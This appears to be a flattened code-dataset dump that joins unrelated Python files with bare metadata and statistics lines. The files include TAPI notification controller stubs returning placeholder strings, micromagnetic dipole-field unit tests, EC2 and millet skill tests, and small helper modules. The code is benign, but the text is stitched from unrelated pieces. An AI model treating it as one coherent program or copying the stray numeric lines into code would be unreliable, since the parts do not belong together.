data_context_notification_context_notif_subscriptionuuid_subscription_filter_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_delete(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_delete removes tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_namevalue_name_put creates or updates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_post(uuid, tapi_notification_subscription_filter=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_post creates tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_subscription_filter: tapi.notification.SubscriptionFilter to be added to list :type tapi_notification_subscription_filter: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_subscription_filter = TapiNotificationSubscriptionFilter.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_put(uuid, tapi_notification_subscription_filter=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_put creates or updates tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_subscription_filter: tapi.notification.SubscriptionFilter to be added or updated :type tapi_notification_subscription_filter: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_subscription_filter = TapiNotificationSubscriptionFilter.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notificationuuid_additional_infovalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_additional_infovalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of additional-info :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notificationuuid_alarm_info_get(uuid): # noqa: E501 """data_context_notification_context_notificationuuid_alarm_info_get returns tapi.notification.AlarmInfo # noqa: E501 :param uuid: Id of notification :type uuid: str :rtype: TapiNotificationAlarmInfo """ return 'do some magic!' def data_context_notification_context_notificationuuid_changed_attributesvalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_changed_attributesvalue_name_get returns tapi.notification.NameAndValueChange # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of changed-attributes :type value_name: str :rtype: TapiNotificationNameAndValueChange """ return 'do some magic!' def data_context_notification_context_notificationuuid_get(uuid): # noqa: E501 """data_context_notification_context_notificationuuid_get returns tapi.notification.Notification # noqa: E501 :param uuid: Id of notification :type uuid: str :rtype: TapiNotificationNotification """ return 'do some magic!' def data_context_notification_context_notificationuuid_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notificationuuid_target_object_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notificationuuid_target_object_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notification :type uuid: str :param value_name: Id of target-object-name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notificationuuid_tca_info_get(uuid): # noqa: E501 """data_context_notification_context_notificationuuid_tca_info_get returns tapi.notification.TcaInfo # noqa: E501 :param uuid: Id of notification :type uuid: str :rtype: TapiNotificationTcaInfo """ return 'do some magic!' def data_context_notification_context_post(tapi_notification_notification_context=None): # noqa: E501 """data_context_notification_context_post creates tapi.notification.NotificationContext # noqa: E501 :param tapi_notification_notification_context: tapi.notification.NotificationContext to be added to list :type tapi_notification_notification_context: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_context = TapiNotificationNotificationContext.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_put(tapi_notification_notification_context=None): # noqa: E501 """data_context_notification_context_put creates or updates tapi.notification.NotificationContext # noqa: E501 :param tapi_notification_notification_context: tapi.notification.NotificationContext to be added or updated :type tapi_notification_notification_context: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_context = TapiNotificationNotificationContext.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_create_notification_subscription_service_post(inline_object2=None): # noqa: E501 """operations_create_notification_subscription_service_post # noqa: E501 :param inline_object2: :type inline_object2: dict | bytes :rtype: TapiNotificationCreateNotificationSubscriptionService """ if connexion.request.is_json: inline_object2 = InlineObject2.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_delete_notification_subscription_service_post(inline_object7=None): # noqa: E501 """operations_delete_notification_subscription_service_post # noqa: E501 :param inline_object7: :type inline_object7: dict | bytes :rtype: TapiNotificationDeleteNotificationSubscriptionService """ if connexion.request.is_json: inline_object7 = InlineObject7.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_get_notification_list_post(inline_object19=None): # noqa: E501 """operations_get_notification_list_post # noqa: E501 :param inline_object19: :type inline_object19: dict | bytes :rtype: TapiNotificationGetNotificationList """ if connexion.request.is_json: inline_object19 = InlineObject19.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_get_notification_subscription_service_details_post(inline_object20=None): # noqa: E501 """operations_get_notification_subscription_service_details_post # noqa: E501 :param inline_object20: :type inline_object20: dict | bytes :rtype: TapiNotificationGetNotificationSubscriptionServiceDetails """ if connexion.request.is_json: inline_object20 = InlineObject20.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def operations_get_notification_subscription_service_list_post(): # noqa: E501 """operations_get_notification_subscription_service_list_post # noqa: E501 :rtype: TapiNotificationGetNotificationSubscriptionServiceList """ return 'do some magic!' def operations_get_supported_notification_types_post(): # noqa: E501 """operations_get_supported_notification_types_post # noqa: E501 :rtype: TapiNotificationGetSupportedNotificationTypes """ return 'do some magic!' def operations_update_notification_subscription_service_post(inline_object28=None): # noqa: E501 """operations_update_notification_subscription_service_post # noqa: E501 :param inline_object28: :type inline_object28: dict | bytes :rtype: TapiNotificationUpdateNotificationSubscriptionService """ if connexion.request.is_json: inline_object28 = InlineObject28.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!'
37.566308
175
0.791814
3,660
31,443
6.436612
0.030328
0.050938
0.089821
0.117158
0.911622
0.901859
0.875287
0.86217
0.833645
0.810977
0
0.018841
0.145883
31,443
836
176
37.611244
0.858356
0.517826
0
0.534091
0
0
0.055448
0
0
0
0
0
0
1
0.301136
false
0
0.136364
0
0.738636
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
7
dddc291d33af2f46594ac1554036c02e0b005588
7,110
py
Python
test/mmag/unit_cell/test_unit_cell.py
SebastiaAgramunt/Micromagnetics
f6888f745cc66f380ee18424196853994311c161
[ "MIT" ]
null
null
null
test/mmag/unit_cell/test_unit_cell.py
SebastiaAgramunt/Micromagnetics
f6888f745cc66f380ee18424196853994311c161
[ "MIT" ]
1
2020-07-28T19:29:31.000Z
2020-09-16T22:06:23.000Z
test/mmag/unit_cell/test_unit_cell.py
SebastiaAgramunt/Micromagnetics
f6888f745cc66f380ee18424196853994311c161
[ "MIT" ]
null
null
null
import unittest import numpy as np from mmag.unit_cell.fields import field_dipole from mmag.unit_cell.cell import Cuboid _acc = 0.0001 # Following tests compare the magnetic field created by a dipole to the field generated by the uniformly # charged sheets. If far enough, the resulting fields must be similar class TestCubicCell(unittest.TestCase): def setUp(self): position = np.array([0.0, 0.0, 0.0], dtype=np.float64) delta = np.array([1.0, 1.0, 1.0], dtype=np.float64) self.init_obj = Cuboid(position, delta) def test_magnetic_field_1(self): # Testing field unirormly magnetized in Z m = np.array([0.0, 0.0, 1.0], dtype=np.float64) r = np.array([0.0, 0.0, 3.0], dtype=np.float64) dipole_field = field_dipole(self.init_obj.position, m, r) box_field = self.init_obj.unit_field(r, m) magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field)) magnitude_box = np.sqrt(box_field.dot(box_field)) self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc) self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc) self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc) self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc) def test_magnetic_field_2(self): # Testing uniform magnetized in X is same as uniformly magnetized in Z m = np.array([0.0, 0.0, 1.0], dtype=np.float64) r = np.array([0.0, 0.0, 3.0], dtype=np.float64) box_field_1 = self.init_obj.unit_field(r, m) m = np.array([1.0, 0.0, 0.0], dtype=np.float64) r = np.array([3.0, 0.0, 0.0], dtype=np.float64) box_field_2 = self.init_obj.unit_field(r, m) self.assertTrue(np.fabs(box_field_1[2] - box_field_2[0]) < _acc) def test_magnetic_field_3(self): # Testing at different positions m = np.array([0.0, 0.0, 1.0], dtype=np.float64) r = np.array([4.0, 1.0, 2.0], dtype=np.float64) dipole_field = field_dipole(self.init_obj.position, m, r) box_field = self.init_obj.unit_field(r, m) magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field)) magnitude_box = np.sqrt(box_field.dot(box_field)) self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc) self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc) self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc) self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc) def test_magnetic_field_4(self): m = np.array([0.0, 0.0, 1.0], dtype=np.float64) r = np.array([1.0, 3.0, 2.0], dtype=np.float64) dipole_field = field_dipole(self.init_obj.position, m, r) box_field = self.init_obj.unit_field(r, m) magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field)) magnitude_box = np.sqrt(box_field.dot(box_field)) self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc) self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc) self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc) self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc) class TestCubicCellDifferentDirections(unittest.TestCase): def setUp(self): position = np.array([0.0, 0.0, 0.0], dtype=np.float64) delta = np.array([1.0, 1.0, 1.0], dtype=np.float64) self.init_obj = Cuboid(position, delta) def test_magnetic_field_1(self): # Testing field unirormly magnetized in Z m = np.array( [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)], dtype=np.float64, ) r = np.array([0.0, 0.0, 3.0], dtype=np.float64) dipole_field = field_dipole(self.init_obj.position, m, r) box_field = self.init_obj.unit_field(r, m) magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field)) magnitude_box = np.sqrt(box_field.dot(box_field)) self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc) self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc) self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc) self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc) def test_magnetic_field_2(self): # Testing field unirormly magnetized in Z m = np.array( [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)], dtype=np.float64, ) r = np.array([1.0, 0.0, 2.0], dtype=np.float64) dipole_field = field_dipole(self.init_obj.position, m, r) box_field = self.init_obj.unit_field(r, m) magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field)) magnitude_box = np.sqrt(box_field.dot(box_field)) self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc) self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc) self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc) self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc) def test_magnetic_field_3(self): # Testing field uniformly magnetized in Z m = np.array( [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)], dtype=np.float64, ) r = np.array([1.0, 5.0, 2.0], dtype=np.float64) dipole_field = field_dipole(self.init_obj.position, m, r) box_field = self.init_obj.unit_field(r, m) magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field)) magnitude_box = np.sqrt(box_field.dot(box_field)) self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc) self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc) self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc) self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc) class TestCubicCellNotOrigin(unittest.TestCase): def setUp(self): position = np.array([1.0, 2.0, 3.0], dtype=np.float64) delta = np.array([1.0, 1.0, 1.0], dtype=np.float64) self.init_obj = Cuboid(position, delta) def test_magnetic_field_1(self): # Testing field unirormly magnetized in Z m = np.array( [1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0), 1.0 / np.sqrt(3.0)], dtype=np.float64, ) r = np.array([7.0, 8.0, 7.0], dtype=np.float64) dipole_field = field_dipole(self.init_obj.position, m, r) box_field = self.init_obj.unit_field(r, m) magnitude_dipole = np.sqrt(dipole_field.dot(dipole_field)) magnitude_box = np.sqrt(box_field.dot(box_field)) print(magnitude_box, magnitude_dipole) print(box_field, dipole_field) self.assertTrue(np.fabs(magnitude_box - magnitude_dipole) < _acc) self.assertTrue(np.fabs(dipole_field[0] - box_field[0]) < _acc) self.assertTrue(np.fabs(dipole_field[1] - box_field[1]) < _acc) self.assertTrue(np.fabs(dipole_field[2] - box_field[2]) < _acc) if __name__ == "__main__": unittest.main()
40.169492
104
0.637553
1,122
7,110
3.840463
0.073084
0.087259
0.02019
0.134602
0.882107
0.881875
0.875609
0.859364
0.829659
0.829195
0
0.049955
0.220113
7,110
176
105
40.397727
0.727142
0.066104
0
0.768595
0
0
0.001207
0
0
0
0
0
0.239669
1
0.090909
false
0
0.033058
0
0.14876
0.016529
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
fb236a350ef9556936198d2879581f2c55ea1815
349
py
Python
tests/internal/instance_type/test_instance_type_g3_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/instance_type/test_instance_type_g3_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
null
null
null
tests/internal/instance_type/test_instance_type_g3_auto.py
frolovv/aws.ec2.compare
582805823492f833d65c0441c4a14dce697c12aa
[ "Apache-2.0" ]
1
2021-12-15T11:58:22.000Z
2021-12-15T11:58:22.000Z
# Testing module instance_type.g3 import pytest import ec2_compare.internal.instance_type.g3 def test_get_internal_data_instance_type_g3_get_instances_list(): assert len(ec2_compare.internal.instance_type.g3.get_instances_list()) > 0 def test_get_internal_data_instance_type_g3_get(): assert len(ec2_compare.internal.instance_type.g3.get) > 0
34.9
76
0.848138
56
349
4.839286
0.339286
0.265683
0.309963
0.250923
0.826568
0.826568
0.612546
0.612546
0.612546
0
0
0.034056
0.074499
349
9
77
38.777778
0.804954
0.088825
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.333333
0
0.666667
0
0
0
0
null
1
1
1
1
1
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
0
0
0
9
34abc0d217e6d2fe1de4fb7babb056c00eaece5f
135
py
Python
riptide_proxy/resources.py
theCapypara/riptide-proxy
1601e5be75acf9f858bd9e06f67cc0b27f4eae61
[ "MIT" ]
2
2019-05-23T10:09:18.000Z
2020-06-22T11:15:30.000Z
riptide_proxy/resources.py
Parakoopa/riptide-proxy
7e684a716f1df655109135e8f83ac43b2936f2b2
[ "MIT" ]
5
2020-02-14T07:32:05.000Z
2020-06-22T11:13:35.000Z
riptide_proxy/resources.py
theCapypara/riptide-proxy
1601e5be75acf9f858bd9e06f67cc0b27f4eae61
[ "MIT" ]
null
null
null
"""template file management""" import pkg_resources def get_resources(): return pkg_resources.resource_filename(__name__, 'tpl')
19.285714
59
0.77037
16
135
6
0.8125
0.25
0
0
0
0
0
0
0
0
0
0
0.118519
135
6
60
22.5
0.806723
0.177778
0
0
0
0
0.028571
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
8
34b1dd2156847b8e707716a768c9d587fa73286f
105
py
Python
syft/he/keys.py
aradhyamathur/PySyft
03f73d31b869596978fb779596075ce806afef34
[ "Apache-2.0" ]
1
2017-09-22T13:11:01.000Z
2017-09-22T13:11:01.000Z
syft/he/keys.py
aradhyamathur/PySyft
03f73d31b869596978fb779596075ce806afef34
[ "Apache-2.0" ]
null
null
null
syft/he/keys.py
aradhyamathur/PySyft
03f73d31b869596978fb779596075ce806afef34
[ "Apache-2.0" ]
1
2020-05-27T10:20:40.000Z
2020-05-27T10:20:40.000Z
import syft def Paillier(n_length=1024): return syft.he.paillier.keys.KeyPair().generate(n_length)
17.5
61
0.761905
16
105
4.875
0.75
0.179487
0
0
0
0
0
0
0
0
0
0.043011
0.114286
105
5
62
21
0.795699
0
0
0
1
0
0
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
7
34b84670a3509130ae9c7eefbb6fcd2800a576d1
129
py
Python
tools/scitools/conf/understand/python/python3/future_builtins.py
brucegua/moocos
575c161cfa35e220f10d042e2e5ca18773691695
[ "Apache-2.0" ]
1
2020-01-20T21:26:46.000Z
2020-01-20T21:26:46.000Z
tools/scitools/conf/understand/python/python3/future_builtins.py
brucegua/moocos
575c161cfa35e220f10d042e2e5ca18773691695
[ "Apache-2.0" ]
null
null
null
tools/scitools/conf/understand/python/python3/future_builtins.py
brucegua/moocos
575c161cfa35e220f10d042e2e5ca18773691695
[ "Apache-2.0" ]
null
null
null
def ascii(arg): pass def filter(pred, iterable): pass def hex(arg): pass def map(func, *iterables): pass def oct(arg): pass
21.5
33
0.689922
22
129
4.045455
0.545455
0.314607
0.224719
0
0
0
0
0
0
0
0
0
0.170543
129
5
34
25.8
0.831776
0
0
0
0
0
0
0
0
0
0
0
0
1
1
false
1
0
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
1
0
0
7
550de1a3a3d84eeeead3aeac2a119d3580fe892c
198
py
Python
skshape/image/segmentation/__init__.py
scikit-shape/scikit-shape
eca3f7f1cf39ef4ce89f17423b3e4ba1aed7eb45
[ "BSD-3-Clause" ]
5
2020-11-13T11:59:42.000Z
2022-02-09T11:45:10.000Z
skshape/image/segmentation/__init__.py
scikit-shape/scikit-shape
eca3f7f1cf39ef4ce89f17423b3e4ba1aed7eb45
[ "BSD-3-Clause" ]
1
2021-02-18T12:05:15.000Z
2021-02-18T12:05:15.000Z
skshape/image/segmentation/__init__.py
scikit-shape/scikit-shape
eca3f7f1cf39ef4ce89f17423b3e4ba1aed7eb45
[ "BSD-3-Clause" ]
1
2022-02-09T11:45:17.000Z
2022-02-09T11:45:17.000Z
from ._segment import segment_by_topology, segment_boundaries, segment_phase_field __all__ = ['segment_by_topology', 'segment_boundaries', 'segment_phase_field' ]
24.75
82
0.691919
20
198
6.1
0.45
0.147541
0.278689
0.393443
0.836066
0.836066
0.836066
0.836066
0
0
0
0
0.237374
198
7
83
28.285714
0.807947
0
0
0
0
0
0.282828
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0
1
0
0
null
0
1
1
1
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
9b92689d9da5cad2c180264bfbfeaf08a772dad4
10,705
py
Python
tests/test_skill.py
odryfox/millet
8800152562f4bd2ac638978865f9a9c862060733
[ "BSD-3-Clause" ]
3
2020-02-01T17:33:22.000Z
2021-08-04T17:02:08.000Z
tests/test_skill.py
odryfox/millet
8800152562f4bd2ac638978865f9a9c862060733
[ "BSD-3-Clause" ]
1
2021-03-19T22:25:04.000Z
2021-10-07T06:53:24.000Z
tests/test_skill.py
odryfox/millet
8800152562f4bd2ac638978865f9a9c862060733
[ "BSD-3-Clause" ]
null
null
null
from millet import BaseSkill class TestSkill: def test_say(self): class EchoSkill(BaseSkill): def execute(self, message: str, user_id: str): self.say(message) skill = EchoSkill() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['hello'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} result = skill.run( message='bye', user_id='100500', history=[], state_name=None, context=result.context ) assert result.answers == ['bye'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_say_return(self): class EchoSkill(BaseSkill): def execute(self, message: str, user_id: str): return message skill = EchoSkill() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['hello'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_double_say(self): class DoubleEchoSkill(BaseSkill): def execute(self, message: str, user_id: str): self.say(message) self.say(message) skill = DoubleEchoSkill() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['hello', 'hello'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} result = skill.run( message='bye', user_id='100500', history=[], state_name=None, context=result.context ) assert result.answers == ['bye', 'bye'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_ask(self): class MeetingSkill(BaseSkill): def execute(self, message: str, user_id: str): name = self.ask('What is your name?') self.say(f'Nice to meet you {name}!') skill = MeetingSkill() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['What is your name?'] assert result.is_relevant assert not result.is_finished assert result.direct_to is None assert result.context == {} result = skill.run( message='Bob', user_id='100500', history=['hello'], state_name=None, context=result.context ) assert result.answers == ['Nice to meet you Bob!'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_ask_with_direct_to(self): class MeetingSkillWithStates(BaseSkill): def execute(self, message: str, user_id: str): self.ask('What is your name?', direct_to='meeting') def meeting(self, name: str, user_id: str): self.say(f'Nice to meet you {name}!') skill = MeetingSkillWithStates() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['What is your name?'] assert result.is_relevant assert not result.is_finished assert result.direct_to == 'meeting' assert result.context == {} result = skill.run( message='Bob', user_id='100500', history=[], state_name='meeting', context=result.context ) assert result.answers == ['Nice to meet you Bob!'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_ask_with_direct_to_callable(self): class MeetingSkillWithStates(BaseSkill): def execute(self, message: str, user_id: str): self.ask('What is your name?', direct_to=self.meeting) def meeting(self, name: str, user_id: str): self.say(f'Nice to meet you {name}!') skill = MeetingSkillWithStates() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['What is your name?'] assert result.is_relevant assert not result.is_finished assert result.direct_to == 'meeting' assert result.context == {} result = skill.run( message='Bob', user_id='100500', history=[], state_name='meeting', context=result.context ) assert result.answers == ['Nice to meet you Bob!'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_specify(self): class AgeSkill(BaseSkill): def execute(self, message: str, user_id: str): try: age = int(message) except ValueError: age = self.specify(question='Are you sure?') self.say(f'You are {age} years old') skill = AgeSkill() result = skill.run( message='twenty four', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['Are you sure?'] assert not result.is_relevant assert not result.is_finished assert result.direct_to is None assert result.context == {} result = skill.run( message='24', user_id='100500', history=['twenty four'], state_name=None, context=result.context, ) assert result.answers == ['You are 24 years old'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_specify_with_direct_to(self): class AgeSkillWithDirectTo(BaseSkill): def execute(self, message: str, user_id: str): try: age = int(message) except ValueError: self.specify(question='Are you sure?', direct_to='execute') self.say(f'You are {age} years old') skill = AgeSkillWithDirectTo() result = skill.run( message='twenty four', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['Are you sure?'] assert not result.is_relevant assert not result.is_finished assert result.direct_to is 'execute' assert result.context == {} result = skill.run( message='24', user_id='100500', history=[], state_name='execute', context=result.context ) assert result.answers == ['You are 24 years old'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_specify_with_direct_to_callable(self): class AgeSkillWithDirectTo(BaseSkill): def execute(self, message: str, user_id: str): try: age = int(message) except ValueError: self.specify(question='Are you sure?', direct_to=self.execute) self.say(f'You are {age} years old') skill = AgeSkillWithDirectTo() result = skill.run( message='twenty four', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['Are you sure?'] assert not result.is_relevant assert not result.is_finished assert result.direct_to is 'execute' assert result.context == {} result = skill.run( message='24', user_id='100500', history=[], state_name='execute', context=result.context ) assert result.answers == ['You are 24 years old'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_override_initial_state_name(self): class EchoSkill(BaseSkill): initial_state_name = 'echo' def echo(self, message: str, user_id: str): self.say(message) skill = EchoSkill() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['hello'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} result = skill.run( message='bye', user_id='100500', history=[], state_name='echo', context=result.context ) assert result.answers == ['bye'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {} def test_context_using(self): class MeetingSkillWithStates(BaseSkill): def execute(self, message: str, user_id: str): self.context['greeting'] = 'Nice to meet you' self.ask('What is your name?', direct_to=self.meeting) def meeting(self, name: str, user_id: str): greeting = self.context['greeting'] self.say(f'{greeting} {name}!') skill = MeetingSkillWithStates() result = skill.run( message='hello', user_id='100500', history=[], state_name=None, context={} ) assert result.answers == ['What is your name?'] assert result.is_relevant assert not result.is_finished assert result.direct_to == 'meeting' assert result.context == {'greeting': 'Nice to meet you'} result = skill.run( message='Bob', user_id='100500', history=[], state_name='meeting', context=result.context ) assert result.answers == ['Nice to meet you Bob!'] assert result.is_relevant assert result.is_finished assert result.direct_to is None assert result.context == {'greeting': 'Nice to meet you'}
31.765579
103
0.583185
1,204
10,705
5.054817
0.059801
0.187315
0.073612
0.072461
0.942162
0.942162
0.926717
0.926717
0.919816
0.898784
0
0.018623
0.3078
10,705
336
104
31.860119
0.802699
0
0
0.771084
0
0
0.091172
0
0
0
0
0
0.421687
1
0.100402
false
0
0.004016
0.004016
0.156627
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
8
9ba2ce207c603585167de18c4584599d9a70a4e8
202
py
Python
deep_recommenders/keras/models/nlp/__init__.py
LongmaoTeamTf/deep_recommenders
168dabe4ef3a38cc582d019766cf3de576bc8af1
[ "Apache-2.0" ]
143
2021-02-04T11:28:07.000Z
2022-03-28T09:02:00.000Z
deep_recommenders/keras/models/nlp/__init__.py
LongmaoTeamTf/Deep-NLP
168dabe4ef3a38cc582d019766cf3de576bc8af1
[ "Apache-2.0" ]
7
2021-03-04T23:59:31.000Z
2022-01-27T05:13:02.000Z
